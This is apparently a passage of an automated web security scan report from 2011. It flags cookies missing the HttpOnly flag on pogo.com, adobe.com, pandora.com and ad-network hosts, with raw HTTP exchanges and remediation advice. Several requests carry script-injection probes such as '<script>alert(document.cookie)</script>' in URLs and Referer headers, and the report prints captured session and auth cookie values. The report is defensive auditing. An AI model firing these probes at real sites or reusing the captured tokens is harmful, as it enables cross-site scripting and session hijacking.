com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/pogo/setCookie.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/lightregview.do Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fbconnect/js.do HTTP/1.1 Host: www.pogo.com Connection: keep-alive Referer: https://www.pogo.com/action/pogo/signin.do?pageSection=footer_login&29ac9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0baf35176c0=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.unid=6606480040153856; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536962788-New%7C1297128962788%3B
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_261541 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=C8DDA40C8F4C2B65082C50B995B886FC; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Set-Cookie: evlu=9f6f0757-8308-4d33-b185-c4e0ced3c79a; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:53 GMT; Path=/ Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:46 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /thesis/ HTTP/1.1 Host: diythemes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event.flow HTTP/1.1 Host: event.adxpose.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=050A46D4E4695FF1279B3090A4F21432; evlu=ddad3821-ec58-4641-be95-961ec5aac4d2;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=513148566CAD5DDB4E79FD10B3255E39; Path=/ Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:14:29 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/ Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>43 Things</title> <m ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
ADBRITE_SESS_1=20vl1tpukh23pji2agsn60lh44; expires=Mon, 17 Jan 2011 02:58:24 GMT; path=/; domain=www.adbrite.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mb/commerce/purchase_form.php HTTP/1.1 Host: www.adbrite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/exchange/ HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/marketplace/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/membership/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/membership/logout.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/partnerportal/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/showcase/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/store/html/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cfusion/support/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events/main.jsp HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:27:31 GMT Server: Jetty/4.2.x (SunOS/5.10 sparc java/1.4.2_02) Set-Cookie: AWID=10.116.66.9.1294550851826;path=/;domain=.adobe.com;expires=Tue, 05-Jan-2021 21:27:31 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=1c1o9aj6r4w3c;path=/ Cache-Control: max-age=900 Expires: Sun, 09 Jan 2011 05:42:31 GMT Connection: close Vary: Accept-Encoding, User-Agent
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html x ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- HTTP/1.1 Host: www.freshnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; expires=Tue, 01 Feb 2011 05:08:39 GMT; path=/; domain=.peanutlabs.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /peanutlabs/ HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mt/w2643334g4y223/ HTTP/1.1 Host: www.pixeltrack66.com Proxy-Connection: keep-alive Referer: http://content.yieldmanager.edgesuite.net/atoms/4b/20/4f/fa/4b204ffa9cd07b1ada562ff40d59b324.swf?clickTag=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F2%2C13%253B0cb5d93d88c4bebb%253B12d6864c680%2C0%253B%253B%253B2580633203%2CiQIAAJ2WCQB3lU0AAAAAAHdEFQAAAAAAAgAEAAYAAAAAAP8AAAAHFB5%2DDwAAAAAA660cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABk2wQAAAAAAAIAAgAAAAAAYsZkaC0BAAAAAAAAAGY0MDZhMzIwLTFiOGYtMTFlMC1hYjI1LTAwMWIyNDc4NGFhNABwAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Epogo%2Ecom%252Fgames%252Fscrabble%253Fpagesection%253Dfree%5Fhome%5Fhot%5Fgames1%5Fpl%5Fscrabble%2C Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 01:35:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Set-Cookie: PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_clk=54267db83a49b89cd0644d669488302a; path=/ Set-Cookie: mt_lds=54267db83a49b89cd0644d669488302a; expires=Tue, 08-Feb-2011 01:35:14 GMT; path=/ Location: http://www.theiq-quiz.com/hv1iqqz/blender_redirect.php?web_id=CD99&exitpops=9175 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.thedailynews.cc Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:20:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html Expires: Sat, 08 Jan 2011 01:20:38 GMT Set-Cookie: UID=15824293; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSASAASQB=KCNAOIEADCPKOCPKACDIKMJH; path=/ Cache-control: private
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3a8a/4/a7/%2a/i;227307433;1-0;0;50967133;3454-728/90;34263360/34281238/1;;~sscs=%3fhttp://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O Set-Cookie: id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sun, 09 Jan 2011 02:03:13 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /server/pixel.htm?fpid=10&sp=y&publisher_redirecturl=http://ad.afy11.net/ad?mode=7 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=undefined%7Cundefined%7Cundefined%7C4; rds=undefined%7Cundefined%7Cundefined%7C14983; rv=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:48:35 GMT Content-Length: 377
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/js/55290?mpt=3334527&mpvc=&no_cj_c=0&upsid=517004695355 HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-cache Set-Cookie: svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://img.mediaplex.com/cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D3334527&mpt=3334527&mpvc= Content-Length: 0 Date: Sun, 09 Jan 2011 02:01:54 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=6036333&rn=1663368886&c7=http%3A%2F%2Fwww.pandora.com%2Fpeople%2F%3Fcf8db%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E09862348e83%3D1&c4=http%253A%2F%2Fwww.pandora.com%2Fpeople%2F%253Fcf8db%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%2Fscript%25253E09862348e83%253D1&c8=Pandora%20Radio%20-%20Listen%20to%20Free%20Internet%20Radio%2C%2&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/people/?cf8db%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E09862348e83=1 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 09 Jan 2011 01:22:52 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:52 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035179&c3=1&c4=65044&c5=128887&c6=&cv=1.3&cj=1&rn=606698040 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536160339719001&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:22:56 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:56 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=6035165&d.c=gif&d.o=eapogocom&d.x=268141464&d.t=page&d.u=http%3A%2F%2Fwww.pogo.com%2Fhome%2Fhome.jsp%3Ff9258%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253E4225969d669%3D1&d.r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:24:25 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:24:25 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?pageSection=footer_board HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/monopoly HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/online-chess HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
